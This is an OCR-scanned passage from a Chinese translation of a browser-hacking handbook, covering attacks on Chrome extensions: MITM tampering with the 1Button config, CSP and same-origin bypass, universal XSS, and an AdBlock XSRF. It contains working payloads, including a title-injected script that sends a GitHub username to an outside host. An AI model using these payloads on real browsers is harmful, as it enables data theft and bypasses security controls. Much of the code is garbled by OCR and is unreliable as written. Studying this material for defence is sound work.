Chrome 的 亚马逊 1Button App 扩 展 “, 为 中 间 人 攻击 提供 了 一 个 很 好 的 例子 。 这 个 扩展 本 质 上 
是 一 个 Web 抓 取 和 跟踪 器 。 它 会 报告 访问 alexa.com 的 所 有 HTTP 和 HTTPS 链 接 ， 而 对 于 选 定 的 网 
站 ， 它 还 会 报告 部 分 内 容 ， 包 括 通 过 HTTPS 执 行 的 谷歌 搜索 。 

为 了 在 不 更 新 扩展 代码 的 情况 下 实现 远程 配置 ,亚马逊 决定 通过 包含 基 些 JavaScript 文 件 的 内 
容 脚 本 来 配置 扩展 。 在 这 个 扩展 的 3.2013.627.0 版 中 ， 会 取得 如 下 文件 : 
O http://www.amazon.com/gp/bit/toolbar/3.0/toolbar/httpsdatalist.dat 
Q http://www.amazon.com/gp/bit/toolbar/3.0/toolbar/search_conf.js 

可 能 有 人 注意 到 了 , 这 两 个 资源 都 是 通过 HTTP 加 载 的 , 实际 上 还 不 止 这 些 。 在 httpsdatalist.dat 
文件 中 ， 给 出 了 监听 的 HTTPS 页 面 列表 。 配 置 内 容 可 以 通过 以 下 代码 得 知 : 


[ 
"https: [/] {2} (www[0-9]?|encrypted)[.] (1.) ?google[.].*[/]" 
] 


文件 search_conf.js 描 述 了 需要 从 浏览 过 的 页 面 中 提取 什么 内 容 报 告 给 Alexa。o 下 面 的 代码 可 以 
让 你 有 所 体会 : 
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"google" : { 
"urlexp" 
"http(s) ?:\\/\\/www\\.google\\..*\\/.*[?#&]q=([*%&] +)", 
"rankometer" : { 


"url": "http(s)?:\\/\\/ (www(1[0-9]) lencrypted)\\.(|1\\.)google\\..*\\/", 
"reload": true, 


"xpath of 
"bloek"r [ 
"//div/ol/li[ contains( 
concat( ' ', normalize-space(@class), ' ' ), 
concag( tut sgt, SY EY 


LEN 
"//div/ol/li[ contains( 
concat( ' ', normalize-space(@class), ' ' ), 
concat4 he Taty 4 
Jalen 7 
"//div/ol/lil contains ( 








concat( ' ', normalize-space(@class), ' ' ), 
concat( " Fy Mgt. Yor) 
Dl, 
15 
"insert" : [ 
",./div/div/div/cite", 
"./div/div[ contains ( 
concat( ' ', normalize-space(@class), ' ' ), 
concat( oto eyes oye) 
)]/cite", 
"./div/div/div/div[ contains ( 
concat( ' ', normalize-space(@class), ' ' ), 
Goncat( $9. ENS eM 
)]/cite" 
Jz 
"targét" + { 
"./div/h3[ contains ( 
concat( ' ', normalize-space(@class), ' '), 
E 


)]/descendant::a/@href", 

",/h3[ contains ( 
concat( ' ', normalize-space(Gclass), ' '), 
Pe 

)]/descendant::a/@href", 

"./div/h3[ contains ( 
concat( ' ', normalize-space(@class), ' '), 
MEE 

)]/descendant::a/Ghref" 
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抓 取 到 的 与 search_confjs 中 的 XPath 表达 式 匹 配 的 网 站 内 容 ， 会 报告 给 http:/widgets.alexa. 
com。 从 前 面 的 配置 内 容 可 以 看 出 来 。 
图 7-14 展 示 了 通过 mitmproxy5 拦 截 到 http:/widgets.alexa.com 的 通信 的 屏幕 截图 。 


POST http://widgets.alexa.com/traffic/rankr/?refeht tpse3A%2P%2Fwww . google .pls2Fsearchf3FlbS3Dht t ps$253A8252F&252Fwww .9 
oogle.pl*252Fsearch&253F-q&2530ddssd25260q082530ddssd2526aq0s92530chrome .0 57 013.1052 0$2526sourceid&253Dchrome' 
5261e%253DUTF -8%2523scl Lent%2530psy -ab*2526q$25 3Dext remel y%2528c on fident%252Bque ry%25260q%253Dext remely$252Bconf i] 
dent*&252Bquery&25269gs 1$253Dserp.3...38517.49376.0.49998.37.24.6.7.7.0.226.2809.11/12/1.24.0. ..0.0.0..1c.1.17.psy| 
-ab. VWluwMnUGJxo'i2526pbx^253D182526bav&253Don . 2w252Cor.r qf.&2526bvm&253Dbv . 48765608%252Cd . ZWUN2526fph253D71763a 
ep e -A aaaea 3.2613 .627 .0%26ai] 
d'e3DJRDTh1 
~ 200 cont cation rd feu 3kB 


widgets.alexa.com 
on: keep-alive 
685 


application/xml 

chrome -extension: //pbj ikboenp fhbbej gkoklgkhj pfogcam 

Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 
text/plain; charset=UTF-8 

gzip,deflate,sdch 

en-US,en;q=0.8, aa 6 

aid-JRDThlrpFMOGES 


Ihttp://www.mridukhullar.com/2013/05/30-days-30-queries/ ^ — 一 

http://www.itv.com/news/story/2013-02-20/pistorius-bail-hearing/ 

http: //www.boysandmaughan.co.uk/site/contact/callback form.html 

http://www.boysandmaughan.co .uk/síte/contact/newsletter subscription/ 

Ittp: //www.boysandmaughan .co.uk/site/contact/ramsgate/ 

int tp: //www.boysandmaughan.co .uk/site/contact/broadstairs/ 

Ihttp://developer.yahoo.com/forum/Updates -Firehose/Inconsistent - responses - f rom-YQL -console- for/1278693265006 -dd8e588c -12f5-3b53 -b5ea-50556b 


fedll6 





图 7-14 ”对 1Button 扩 展 进 行 中 间 人 攻击 


还 有 一 个 更 让 人 吃惊 的 漏洞 ,还 记得 配置 URL 吗 ?这 些 URL 是 通过 HTTP 而 非 HTTPS 取 得 的 。 





因此 同样 给 了 中 间 人 攻击 以 可 乘 之 机 。 
假设 我 们 通过 中 间 人 攻击 技术 ， 将 httpsdatalistdat 蔡 换 成 了 以 下 代码 : 
[nttpssz/y*] 


而 在 拦截 search_conf.js 请 求 时 也 使 用 如 下 代码 : 


{ 


" pwn " : { 
"urlexp" 
"rankomet 

n url n 


"http(s)?:iXN/NNZ", 
er. pod 


:"http(s)?:\\/\\/", 


"reload": true, 


"xpath" 
"bloc 
nal 

], 
"inse 
EL 

1% 
"targ 
"// 


} 

Jer 

"cba" s 
"url" 
"reload 


( 
k"s [ 
html" 


Ente 下 
html" 


et" : [ 
html" 





:"http(s)?:\\/\\/", 


"y true 
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j 
} 


通过 这 样 的 攻击 ， 该 扩展 将 (向 Alexa ) 报告 所 有 HTTPS 网 站 的 DOM 节 点 内 容 。 甚 至 可 以 在 
不 向 特权 上 下 文中 注入 指令 的 情况 下 ,实现 此 攻击 。 所 要 做 的 仅仅 是 修改 配置 ， 就 可 以 看 到 用 户 
发 出 的 所 有 请 求 。 

2. 绕 过 Web 应 用 CSP 

有 一 个 Chrome 扩 展 组 件 显然 没有 受到 CSP 保 护 。 通 过 在 响应 中 包含 X-Content-Security- 
Policy HTTP 首 部 ，Web 应 用 可 以 利用 CSP。 扩 展 后台 页 默认 也 有 CSP。 而 没有 受 保护 的 组 件 就 
是 内 容 脚 本 。 

没 错 ，Chrome 扩 展 的 内 容 脚 本 根本 不 受 CSP 保 护 。 利 用 这 一 点 ， 可 以 绕 过 Web 应 用 开发 者 实 
现 的 各 种 讨厌 的 CSP 限 制 。 下 面 我 们 就 来 看 看 如 何 利 用 这 个 组 件 达 到 攻击 目的 。 

以 http://content-security-policy.com 源 为 例 。 如 果 加 载 这 个 URL， 就 可 以 看 到 相关 的 CSP 首 部 ， 
比如 : 


X-Content-Security-Policy: default-src 'self' www.google-analytics.com 
netdna.bootstrapcdn.com ajax.googleapis.com; 
object-src 'none'; media-src 'none'; frame-src 'none'; connect-src 'none'; 


首先 ,我们 注意 到 这 里 没有 unsafe-eval 指 令 。 这 意味 着 在 攻击 该 源 时 ， 不 能 利用 eval 函 
数 (或 者 它 的 朋友 ， 像 第 3 章 讨论 的 那样 ) 达到 目的 。 好 吧 ， 除 非 目 标的 内 容 脚 本 中 有 漏洞 。 
下 面 是 一 个 存在 漏洞 的 内 容 脚 本 ， 可 以 演示 如 何 利 用 它 绕 过 CSP: 


// 获取 bhh URL 参 数 
var bhh = document.location.href.split('bhh=')[1]; 
if (typeof bhh == 'string') { 


eval(bhh); // 参数 eval 
} 


相对 应 的 清单 文件 如 下 ， 只 在 http://content-security-policy.com 源 中 使 用 内 容 脚 本 : 
{ 


















































"name": "Browser Hacker's Handbook CSP Bypass Example", 

“Versions "1.0"; 

"description": "Browser Hacker's Handbook CSP Bypass Demonstration", 
"homepage url": "http://browserhacker.com", 

"permissions": [ 


"http://content-security-policy.com/*" 
Is 
"content scripts": [ 
{ 
"all_frames": true, 
P gs toss rp 
"os.js" 
Iy 
"matches": [ 
"http://content-security-policy.com/*" 
] 


/ 
"run at": "document end", 
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"all frames": true 
} 
l, 
"manifest_version": 2 


} 
找到 存在 漏洞 的 内 容 脚 本 后 ， 下 面 就 来 绕 过 放 在 这 个 网 站 HTTP 首 部 的 CSP 控 件 : 


http://content-security-policy.com/#bhh= 
eval (alert ('Browser Hacker\'s Handbook')) 


目标 浏览 器 在 加 载 前 面 的 URL 时 ， 就 会 绕 过 CSP。 可 以 看 到 注入 内 容 脚 本 中 的 eval 执 行 后 ， 
在 相应 源 中 弹出 的 警告 对 话 框 。 图 7-15 展 示 A 








————— " 
© OO | content Security Policy pe x i y 








€ > X fi [content-security-policy.com/4bhh-eval(alert(Browser Hacker\'s Handbook’) yz 三 





908px x 315px 


olicy (CSP) Quick Reference Guide 


The page at content-security-policy.com 


rity 
Policy Reference 


says: 
Browser Hacker's Handbook 





X Elements Resources |Network| Sources Timeline Profiles Audits Console 





Name xo a 
[But | [Headers | Preview Response Cookies Timing 
[==] content-security-policy.... Request URL: http://content-security-policy.com/ 
— Request Method: GET 
Status Code: @ 200 0k 

[zx] bootstrap.min.css 

=) netdna.bootstrapcdn.com/ icon. gemstone ini c 

wResponse Headers ^ view source 

(Gaal sylecss Connection: close 

= css Content-Type: text/html; charset=UTF-8 
二 Date: Sat，36 Nov 2013 05:54:54 GMT 
Server: Apache 





ajax.googleapis.com/ajax Tünife Excdieg: cond 
-| bootstrap.min.js X-Content-Security-Policy: jefes tt-src ‘self! wa w. google an ties com etin na.bootstrapcdn.com a 
=J netdna.bootstrapcdn.com/ jax.googleapis.com; object-src ' ; media-s fri *non 
‘none’ 
google-analytics.js 
= i 





X-Webkit-CSP: default-src 'self' www.google-analytics.com netdna.bootstrapcdn.com ajax.googlea 
Pis.com; object-src 'none'; media-src 'none'; frame-src 'none'; connect-src 





jx Q = @ © Q |Documents Stylesheets Images Scripts XHR Fonts WebSockets Other o1501 % 


图 7-15 ”在 Chrome 扩 展 中 绕 过 网 站 的 CSP 











这 样 就 通过 Chrome 扩 展 中 的 漏洞 ， 成 功 绕 过 了 Web 应 用 设置 的 CSP。 更 确切 地 说 ， 就 是 利用 

Eo 的 内 容 脚本 中 的 漏洞 。 
. 绕 过 同 源 策略 

Mes Chrome 扩 展 的 内 容 脚 本 拥有 比 标准 互联 网 区 域 更 高 的 权限 。 虽 然 它 拥有 的 额外 
权限 并 不 多 , 但 有 一 项 是 你 感 兴趣 的 , 那 就 是 可 以 读 取 跨 域 请 求 的 响应 。 单 纯 就 这 一 点 来 说 就 很 
厉害 ， 不 过 不 止 如 此 。 在 发 送 跨 域 请 求 时 ， 首 部 会 包含 与 相应 源 关联 的 cookie。 没 错 ，cookie 中 
也 会 包含 已 经 认证 过 的 会 话 令 牌 。 

可 以 通过 多 种 方式 操作 内 容 脚本 ， 根 据 目 的 不 同 ， 情 况 也 不 一 样 。 多 数 情况 下 ， 内 容 脚本 可 
与 DOM 交 互 。 实 际 上 ，DOM 经 常 是 攻击 面 的 一 部 分 。 
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攻击 扩展 的 内 容 脚本 与 利用 经 典 的 DOM XSS 非 常 类 似 。 因 此 ， 在 这 里 可 以 重用 你 的 DOM 
XSS 知 识 以 利用 扩展 。 

为 了 实现 利用 ， 内 容 脚 本 需要 获得 你 的 数据 ， 并 在 特权 上 下 文中 使 用 它 。 在 DOM 中 的 具体 
WHE, 取决 于 目标 扩展 。 不 过 ，<tit1e> 元 素 通 常 是 个 不 错 的 选择 ， 因 为 很 多 扩展 都 从 <tit1e> 
元 素 中 读 取 内 容 。 

仅仅 是 在 内 容 脚本 中 的 DOM 使 用 你 的 数据 , 并 不 能 保证 它 会 执行 。 要 利用 内 容 脚 本 , 扩展 
必须 在 eval 隐 数 、innerHTML 赋 值 等 中 使 用 你 的 数据 。 以 下 内 容 脚 本 展示 了 一 个 可 以 利用 的 
漏洞 : 

function do_something(title) { 


// 利用 网 页 标题 做 些 事 
} 




















var title = document.title; 
window.setTimeout ("do_something(\"" + title + "\")", 500); 


漏洞 在 于 这 个 内 容 脚本 不 安全 地 使 用 页 面 的 标题 内 容 。 勾 连 浏览 器 后 ,可 以 发 送 命令 , 让 它 
加 载 男 一 个 源 。 如 果 让 它 加 载 一 个 你 控制 的 源 , 就 可 以 完全 控制 <tit1ie> 属 性 的 内 容 。 之 后 ， 可 
以 向 目标 浏览 器 发 送 任 何 标 题 内 容 。 假 设 你 发 送 的 网 页 HTML 如 下 : 











<HTML> 
<HEAD> 
TITLES): 
var xhr - new XMLHttpRequest(); 
xhr.open("GET", 'https://github.com/settings/profile/', true); 


xhr.onreadystatechange - function() ( 


if (xhr.readyState -- 4) ( 
github settings page - xhr.responseText; 
var name regexp = /«input type="text" value="(.*)" tabindex="2"\/>/g; 


var name arr - name regexp.exec(github settings page); 
name - name arr[1]; 
new Image().src = "http://browserhacker.com/" + encodeURI (name); 
un 
i; 
xhr.send(); 
a=("</TITLE> 
</HEAD> 
<BODY> 
Browser Hacker's Handbook Extension SOP Bypass Example 
</BODY> 
</HTML> 


发 送 这 个 页 面 后 ， 就 等 于 把 代码 注入 到 了 chrome:W/ 区 域 。title 的 内 容 被 传人 了 set- 
Timeout 函 数 ， 稍 等 一 小 会 儿 ， 就 会 执行 。 

在 这 个 例子 中 , 你 的 代码 是 在 安全 边界 的 低 权 限 区 域 执行 的 。 换 名 话说 ,是 在 内 容 脚本 而 不 
是 后 台 页 面 中 执行 的 。 在 这 个 半 特 权 位 置 , 还 可 以 继续 向 扩展 的 匹配 模式 允许 的 任意 源 发 送 跨 域 
请 求 。 
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这 里 的 利用 代码 向 https://github.com 发 送 一 个 跨 域 请 求 ,请求 已 经 认证 过 的 用 户 的 设置 页 面 。 
得 到 响应 后 ， 它 会 提取 出 用 户 名 ， 然 后 将 其 发 送 给 http://browserhacker.com。 显 然 ， 这 个 任务 很 
简单 ， 其 实 能 做 的 更 多 。 

图 7-16 展 示 了 使 用 前 面 的 HTML 利 用 这 个 扩展 的 情景 。 可 以 看 到 标签 页 中 的 标题 中 包含 注入 
的 代码 ， 而 在 控制 台中 ， 一 个 GET 请 求 中 包含 着 GitHub 的 用 户 名 ， 这 里 是 Wade Alcorn. 








9 O O / 5 var xhr = new xmlhttp: x VL 








€ > Q fi O hrowserhacker.com/extension-sop-bypass.html 





Browser Hacker's Handbsok Extension SOP Bypass Example 


X Elements Resources Network Sources Timeline~Profiles Audits | Console | 





© GET http://browserhacker.com/Wades&20Alcorn 404 (not found) MM1454:1 
> 








>= Q © <topframe> v «page context> v W Q | Errors warnings Logs Debug O1 这 


Al7-16 “在 Chrome 扩 展 中 绕 过 SOP 


EDOM XSS 漏 洞 一 样 ， 关 键 在 于 找到 使 用 未 过 滤 数 据 的 漏洞 函数 。 只 不 过 ， 现 在 需要 从 扩 - 
展 代码 而 不 是 web 应 用 中 寻找 这 样 一 个 函数 。 

绕 过 同 源 策略 的 例子 

Chrome 扩 展 ezLinkPreview” 的 5.2.2 版 ， 是 一 个 可 以 绕 过 同 源 策略 的 好 例子 。 看 看 它 的 代码 ， 
就 可 以 看 到 下 面 这 个 消 数 ; 


function GetURLDocumentTitleJQ(url) { 








var ezPageTitle = url; // 将 URL 作 为 默认 标题 
S.ajax({ 
url: url, 
async: true, 
success: function(data) { 
try { 
var matches = data.match(/<title>(.*?)<\/title>/) ; 
var title = matches[1]; 
if (title != null && title.length > 0) { 
ezPageTitle = title; 
} 
} catch (err) {} 
var scr = 'ezBookmarkOneClick("' + url + '", "' + ezPageTitle + '");'; 
chrome.tabs.executeScript (null, {code: scr}); 


F 

仔细 看 一 看 , A2RIMMGetURLDocument Tit leJORIBURATCA TEN AAS B BRUT, MEE 
台 页 面 中 执行 的 。 在 解释 为 什么 之 前 ， 先 来 看 看 这 个 函数 都 于 了 什么 。 

这 个 函数 向 url 参 数 指定 的 URL 发 送 了 一 个 XHR 请 求 。 在 接收 到 响应 后 ， 它 提取 出 <title> 
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和 </title> 标 签 之 间 的 文本 内 容 ， 然 后 加 以 处 理 。 接 下 来 ， 它 以 取得 的 标题 内 容 调用 chrome . 
tabs.executeScript 函数 ”7。 

在 通过 chrome.tabs.executeScript 图 数 执行 之 前 ， 标 题 的 内 容 并 未 经 过 任何 过 滤 。 这 
样 就 在 扩展 中 产生 了 漏洞 。 

利用 该 扩展 中 这 一 漏洞 的 方式 有 很 多 。 下 面 注入 的 代码 经 过 了 简化 , 但 可 以 帮 你 验证 扩展 是 
否 真 的 存在 那么 一 个 漏洞: 

<title>anything"+console.log(1)+"</title> 

要 发 动 利 用 , 受害 者 浏览 器 必须 调用 GetURLDocumentTitleJ0 哺 数 ， 以 请 求 恶 意 页面 。 当 
W, 它 也 正 是 这 样 向 你 暴露 其 漏洞 的 。 此 时 还 需要 一 步 ， 因 为 存在 漏洞 的 函数 ， 只 有 在 用 户 同 意 
将 当前 页 面 加 入 Google Bookmarks 时 ， 才 会 被 调用 。 那 么 需要 一 个 社会 工程 学 元 素 ， 引 导 用 户 去 
触发 上 下 文 菜单 项 。 第 5$ 章 介绍 了 相关 的 社会 工程 学 技术 ， 有 必要 的 话 可 以 翻 回去 看 一 看 。 

GetURLDocumentTit1leJQ 函 数 是 在 后 台 页 面 中 调用 的 。 可 能 你 会 因此 觉得 它 会 在 安全 边界 
的 特权 端 运行 。 那 为 什么 注入 的 代码 在 内 容 脚本 的 上 下 文中 执行 ? 答案 就 在 于 使 用 了 execute- 
Script 困 数 。 它 把 JavaScript 注 入 页 面 ， 然 后 当 第 二 个 参数 有 一 个 codqe 属 性 时 ， 它 会 以 传人 的 代 
码 创 建 一 个 全 新 的 内 容 脚本 。 

换 句 话说 ， 利用 这 个 扩展 之 后 ,该 函数 会 使 用 你 注入 的 指令 , 创建 一 个 新 的 内 容 脚 本 。 新 的 
内 容 脚 本 然后 会 在 Chrome 扩 展 安 全 边界 无 特权 一 端 运 行 。 相 对 于 真正 的 扩展 漏洞 ， 这 样 运 行 的 
影响 并 不 大 ， 但 仍然 可 以 绕 过 同 源 策略 。 

通过 这 个 例子 ,可 以 了 解 如 何 利 用 有 漏洞 的 扩展 绕 过 SOP。 这 里 展示 的 技术 对 于 其 他 存在 类 
似 问 题 的 扩展 也 是 适用 的 。 

4. 普遍 的 XSS 攻 击 

即使 Web 应 用 本 身 无 法 利用 ， 也 可 以 通过 扩展 向 浏览 器 中 引入 XSS 漏 洞 。 浏 览 器 与 Web 应 用 
是 一 种 共生 关系 ， 这 一 点 不 能 二， 而 这 种 关系 是 可 以 利用 的 。 

使 用 有 漏洞 的 扩展 浏览 一 个 源 ， 可 能 导致 该 源 在 该 漏洞 上 陷 进 去 。 当 然 ，Web 应 用 不 会 对 所 
有 用 户 而 言 都 存在 漏洞 ， 重 点 仍然 是 浏览 器 与 Web 应 用 之 间 的 关系 。 

对 传统 的 XSS 而 言 ， 这 都 无 所 谓 。 但 如 果 某 个 浏览 器 的 扩展 中 存在 一 个 XSS 漏 洞 ， 那 就 有 可 
能 在 浏览 器 加 载 的 任意 页 面 上 被 利用 。 

以 下 代码 取 自 一 个 包含 漏洞 的 Chrome 扩 展 的 内 容 脚 本 。 有 读者 可 以 会 发 现 它们 与 前 面 某 个 
例子 中 的 代码 一 样 。 可 以 通过 向 bhh 参 数 添加 JavaScript 代 码 ， 来 利用 这 个 漏洞 : 

// 获取 bhh URL 参 数 

var bhh = document.location.href.split('bhh=') [1]; 

if (typeof bhh == 'string') { 


eval(bhh); // 参数 eval 
} 


这 个 扩展 的 清单 文件 如 下 , 它 在 告诉 Chrome 按 照 <a11_urls> 指 定 的 那样 ,在 所 有 源 中 执行 
内 容 脚本 : 
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"name": "Browser Hacker's Handbook UXSS Example", 
"version": "1.0", 
"description": "Browser Hacker's Handbook Universal XSS Demonstration", 
"homepage_url": "http://browserhacker.com", 
"permissions": [ 
"<all_urls>" 
l, 
"content_scripts": [ 
{ 
"all_frames": true, 
Ma Stee tf 
"cess" 
Vi 
"matches": [ 
"call urls»" 
l, 
"run at": "document end", 
"all frames": true 
} 
ep 
"manifest_version": 2 


} 
图 7-17 展 示 了 这 个 有 漏洞 的 内 容 脚本 是 怎么 在 浏览 器 查看 的 每 个 网 页 中 引入 XSS 漏 洞 的 。 











€7> xf [ www.bing.com/#bhh=alert("Browser Hacker\'s Handbook") 


EA W a v F 
X Elements Resources | Network! Sources Timeline Profiles Audits Console 





Name Ix 
Path | * [Headers | Preview Response Cookies Timing 


图 www.bing.com Request URL: http://www. bing.com/ 

=s Request Method: GET 

加 Devilsisland, EN-AU128. Status Code: ©2000 

Tas fipechbg/r Y Request Headers ^ view parsed 
GET / QITP/1.1 
| hpc12.png Host: www> 

— /s/a Connection: ki 
Accept: text/html, ap E 
User-Agent: Mozilla/S.0 ; Intel Mac OS X 10 9 0) AppleWebKit/537.36 (KHTML, l 
ike Gecko) Chrome/31.0. 1650.57 Satari/537.36 
Accept-Encoding: gzip,deflate, sdch 
Accept-Language: en-US, en; q=0. 8 
Cookie: MUIDB=3C149DEFD4F262261D6E987ADSD062A4; SRCHUID=V=26GUID=200312F483A642D784A8CA 
D36728C014; SRCHUSR-AUTOREDIR-0&GEOVAR-&008-20131130; _FS=NU=1; MUID=3C149DEFD4F262261D 
6E987AD5D062A4; SRCHD=SM=16MS=31107616D=3110761GAF=NOFORM; _SS=SID=A99E24686C4944799A1B 

3 requests | 40.0 KB transferred 77A6C109F104&bIms431704&nhIms03-; RMS=F=OAAAQGAWAARGA=GQAAAAAAT; SCRHDN=ASD=OSDURL=#; W 


>=) Q :2 € © ED | Documents stylesheets images Scripts XHR Fonts WebSockets Other L-] 


图 7-17 ”Chrome 中 的 SOP 扩 展 漏洞 引入 的 XSS 
图 7-17 中 的 箭头 分 别 指向 注入 的 人 代码、 警告 对 话 框 和 并 不 包含 利用 的 HTTP 请 求 。 显 然 ， 这 
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个 漏洞 与 DOM XSS 漏 洞 很 像 。 换 句 话说 ,通过 在 URL 中 使 用 # 符 号 , 浏览 器 不 会 将 位 于 它 后 面 的 
任何 内 容 发 送 给 Web 服 务 器 。 通 过 把 利用 代码 放 到 # 后 面 ， 服 务 器 日 志 中 不 会 出 现 ，Web 应 用 的 
防火 墙 也 不 会 检测 到 。 

别 忘 了 这 个 扩展 中 使 用 的 匹配 模式 。 如 果 它 使 用 的 是 宽泛 的 匹配 模式 ， 那 么 与 该 模式 匹配 的 
任意 源 都 将 出 现 漏洞 。 如 果 匹 配 模式 是 http://*/*、*://*/* 和 <all_urls>, 问题 就 更 严重 了 。 

5. 跨 站 点 请 求 伪 造 

XSRF ( Cross-site Request Forgery， 跨 站 点 请 求 伪造 ) 在 前 几 章 中 讨论 过 ， 到 第 9 章 还 会 重点 
介绍 。 关 键 在 于 要 知道 在 很 多 情况 下 ， 可 以 把 扩展 想象 成 一 个 虚拟 的 Web 应 用 ， 因 为 扩展 也 可 能 
存在 与 Web 应 用 相同 的 (或 类 似 的 ) 漏洞 。 

前 面 在 7.2.3 节 曾 提 到 利用 welpb_accessible_resources 参 数 ,。 这 个 manifest.json 文 件 中 的 参 
数 用 于 列 出 扩展 中 可 以 访问 的 白 名 单 文件 : 


{ 
{ 
"name": "extensionName", 
"version": "versionString", 
"manifest_version": 2 



















































































by 
"web_accessible_resources": [ "logo.png", "menu.html", "style.css" 


} 

这 意味 着 从 任何 网 页 都 可 以 访问 这 些 资 源 。 如 果 manifest.json 文 件 中 包含 上 面 的 代码 ， 那 么 
下 面 的 URL 就 是 可 以 访问 的 : 

chrome-extension://abcdefghijklmnopqrstuvwxyz012345/menu.html 

在 某 些 条 件 下 , 仅仅 加 载 资源 就 可 以 触发 某 些 副作用 ,并 在 底层 扩展 中 执行 操作 。 其 中 有 些 
操作 被 证 实 对 扩展 安全 而 言 是 至 关 重 要 的 。 

假设 有 一 个 扩展 ,在 加 载 位 于 白 名 单 中 的 UI 页 面 时 , 会 从 GET 请 求 中 读 取 一 个 配置 参数 。 加 
载 完成 后 ( 包括 提供 了 参数 后 )， 关 键 的 配置 数据 就 保存 在 LocalStorage 中 。 

我 们 只 关注 该 页 面 作为 白 名 单 文件 ， 出 现在 了 web_accessible_resources 参 数 中 。 这 一 
点 很 重要 ， 因 为 它 意味 着 任何 网 页 都 可 以 在 一 个 <iframe> 中 包含 它 。 加 载 这 个 包含 定制 URL 的 
V HE , 会 导致 这 个 虚构 扩展 的 Localstorage 对 象 中 保存 任意 内 容 。 

这 有 点 像 传统 的 客户 端 - 服 务 器 应 用 中 的 CSRF 攻 击 ， 因 为 不 需要 验证 请 求 来 源 即 可 发 起 
攻击 。 

跨 站 点 请 求 伪 造 的 例子 

上 一 小 节 讨 论 了 一 个 虚构 的 例子 。 没 错 ， 这 不 是 真 的 。 但 至 少 有 一 个 Chrome 扩 展 〈 基 于 清 
单 文件 版 本 1 ) 存在 该 XSRF 漏 洞 ， 而 且 还 相当 流行 ， 用 户 多 达 百 万 以 上 。 

令 人 惊讶 的 是 ，Chrome 扩 展 AdBlock”2.5.22 用 于 屏蔽 广告 。 该 扩展 的 一 个 功能 就 是 订阅 从 
给 定 的 URL 下 载 的 过 滤 天 列表 。 

就 在 过 滤器 订阅 页 面 中 ,存在 一 个 XFRF 漏 洞 ”。 打 开 以 下 URL,， 在 chrome:/ 区 域 执行 ， 就 会 
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触发 相应 订阅 功能 : 
chrome-extension://gighmmpiobklfepjocnamgkkbiglidom/pages/subscribe.html 
加 载 subscribe.html 资 源 时 会 执行 的 指令 包含 在 subscribe.js 脚 本 中 W”。 相 关内 容 “ 如 下 面 代码 
Hz. 
// 获取 URL 


var queryparts = parseUri.parseSearch(document.location.search); 


// 订阅 列表 
var requiresList = queryparts.requiresLocation ? 

"url:" + queryparts.requiresLocation : undefined; 
BGcall("subscribe", 

(id: 'url:' + queryparts.location, requires:requiresList)); 


这 段 代码 显示 了 产生 漏洞 的 执行 过 程 。 第 一 行 代码 解析 URE 的 搜索 部 分 , 得 到 的 散 列 值 保 存 
在 变量 queryparts 中 。 最 后 一 行 通过 最 初 保存 在 请 求 的 location 2 ft 中 的 值 , 来 实现 对 
AdBlock 的 订阅 。 如 果 URL 中 的 参数 是 1ocation=http://browserhacker.com， 那 就 是 从 
http:/browserhacker com 订 阅 过 滤 需 。 那 么 ， 整 个 URL 如 下 所 示 : 


























chrome-extension://gighmmpiobklfepjocnamgkkbiglidom/pages 
/subscribe.html?location- 
http://browserhacker.com 


TARTAR TE, BeTORTUROEAOMDHUE. BCQUEE—- P HEAR, MERR 
subscribe.html 扩 展 资源 ， 并 传人 你 希望 它 加 载 的 过 滤器 。 在 这 里 ， 我 们 希望 过 滤器 把 所 有 URL 都 
HARAP: 


<iframe style="position:absolute;left:-1000px;" id="bhh" src=""></iframe> 
LI sens 

var url - "chrome-extension://"; 

url «- "gighmmpiobklfepjocnamgkkbiglidom"; 

url «- "/pages/subscribe.html?"; 

url «- "location-http://browserhacker.com/list.txt"; 
document.getElementById('bhh').src - url; 


使 用 这 段 代码 , EL DI V, o o EHE TIL RARUS ARE, 并 将 http://browserhacker.com/list. 
txt 作 为 BGcall 扩 展 函 数 的 值 ， 然 后 该 函数 会 加 载 它 。 

Je tfi RR RAE, 就 是 向 扩展 返回 白 名 单 。 因此 把 包含 如 下 内 容 的 list.txt 放 在 你 的 服务 器 上 ， 
AdBlock 就 会 被 禁用 : 


[Adblock Plus 0.7.5] 
@@*Sdocument , domain=~whitelist.all 


重要 的 事情 需要 再 强调 ， 这 个 漏洞 只 在 清单 文件 版 本 1 下 存在 。 如 果 在 当前 版 本 的 Chrome 扩 
展 (使 用 清单 文件 版 本 2 ) 中 成 功 实现 攻击 , 请 求 的 资源 必须 列 在 web_accessible_resources 
参数 中 : 


"web_accessible_resources": "img/icon24.png", 
"jguery/css/images/ui-bg inset-hard 100 fcfdfd 1x100.png", 
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"jquery/css/images/ui-icons_056b93_2.6.440.png", 
"jquery/css/images/ui-icons, d8e7f3 2.6.440.png", 
"jquery/css/jquery-ui.custom.css", 
"jquery/css/override-page.css" ] 


从 前 面 的 代码 可 以 看 出 ,AdBlock 2.6.4 的 清单 文件 中 , BUS web accessible resources 
中 的 supscribe.html 字 符 串 。 因 此 , 在 对 目标 扩展 发 动 此 类 攻击 之 前 ， 别 忘 了 检查 manifestjson 
文件 。 

6. 攻击 DOM 事 件 处 理 程 序 

Firefox 中 chrome:// 区 域 与 不 受信 任 区 域 间 的 通信 , 也 可 以 通过 DOM 事 件 实现 。 相 应 的 扩展 会 
在 chrome:// 区 域 中 注册 一 个 事件 监听 器 ， 等 待 网 页 输入 。 相 应 事件 触发 后 ， 就 会 根据 接收 到 的 信 
息 执 行 操作 。 

是 否 验 证 与 处 理 程序 交互 的 内 容 有 没有 被 授权 ,取决 于 扩展 开发 者 。 即 使 经 过 验证 没有 授权 ， 
扩展 也 可 能 允许 脚本 被 注入 chrome:// 区 域 ， 导致 绕 过 保护 措施 。 

攻击 拖 放 

Firefox 通 过 使 用 一 系列 事件 处 理 程序 ,支持 拖 放 操 作 :dragstart ,dragenter ,dragover .dragleave、 
drag 、drop 和 dragend。 图 片 、 文 本 、 链 接 和 DOM 节 点 ， 都 可 以 从 页 面 中 一 个 地 方 被 拖 放 到 另 一 个 
地 方 ， 有 时 候 还 能 直接 拖 放 到 扩展 里 。 
需要 注意 的 是 , 如 果 拖 放 的 是 带 属性 的 HTML 元 素 或 DOM 节 点 , 那么 这 些 元 素 或 节点 的 所 有 
属性 和 方法 都 会 被 复制 到 新 位 置 。 在 将 元 素 拖 放 到 chrome:// 区 域 时 ， 就 可 能 出 现 问题 。 如 果 一 个 
